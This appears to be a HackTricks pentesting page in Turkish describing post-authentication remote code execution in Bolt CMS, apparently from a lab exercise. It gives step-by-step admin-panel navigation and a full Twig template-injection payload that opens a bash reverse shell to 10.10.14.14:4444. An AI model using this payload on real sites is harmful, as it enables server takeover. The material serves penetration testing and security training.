Bolt CMS
Last updated
Last updated
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Admin olarak giriş yaptıktan sonra (giriş istemine erişmek için /bot'a gidin), Bolt CMS'de RCE alabilirsiniz:
Configuration -> View Configuration -> Main Configuration seçin veya URL yoluna /bolt/file-edit/config?file=/bolt/config.yaml gidin
Tema değerini kontrol edin
File management -> View & edit templates seçin
Önceki adımda bulunan tema tabanını seçin (base-2021 bu durumda) ve index.twig seçin
Benim durumumda bu URL yolunda /bolt/file-edit/themes?file=/base-2021/index.twig
Bu dosyada template injection (Twig) ile yüklemenizi ayarlayın, örneğin: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
Ve değişiklikleri kaydedin
Maintenance -> Clear the cache kısmında önbelleği temizleyin
Sayfaya tekrar normal bir kullanıcı olarak erişin ve yükleme çalıştırılmalıdır
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
